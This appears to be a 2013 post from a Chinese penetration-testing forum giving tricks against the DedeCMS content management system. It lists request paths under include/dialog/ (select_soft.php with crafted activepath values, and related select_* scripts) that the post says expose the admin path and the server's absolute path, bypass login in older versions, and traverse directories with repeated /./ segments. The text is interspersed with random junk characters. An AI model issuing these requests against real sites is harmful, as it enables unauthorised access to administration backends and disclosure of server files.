中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]
作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理( c+ K* m4 e5 b* }& N1 |9 T

" T* y. Y# T8 G: q3 D" A7 V3 A6 j员帐号,新版本的就直接转向了后台.
9 E% c1 O8 f6 W  l( W$ G5 c
) \( g9 G6 |) |' T2.include/dialog/config.php会爆出后台管理路径
. |' ^5 y8 f$ ]8 S. y5 t& Z0 t" w# a
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录1 F; T6 @& d+ s+ J* X

& c5 e* j# Q  P% Z8 {4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.. q4 u. r# t8 ~1 [6 F

1 [) N8 H" C! [! O5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉; z* S( S" f/ P* x* ^. [) \
( N4 M! s/ z+ C  W4 B1 V: f' I0 X  @- n
到根目录去.不过这些版本的访问地址有些不同.
0 o/ G- Z( ~7 D! T2 _9 \地址为require/dialog/select_soft.php?activepath=/././././././././
* ]" w+ A  A3 w5 r6 M; ~4 f
" R3 X" i! L" v$ X# E( D+ Hinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..( s. E# {! @; K. p* d2 H3 e# {
存在相同问题的文件还有
2 h) j. ?: }3 R8 ^) [8 D8 m  ~  Xinclude\dialog\select_images.php
* z$ C' e. p' R5 B2 D9 d' o$ Ainclude\dialog\select_media.php
0 _  m7 U4 M8 m& k8 R. Ninclude\dialog\select_templets.php​& b$ T7 G, v1 z. m( z8 v5 ]% ]& Q




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2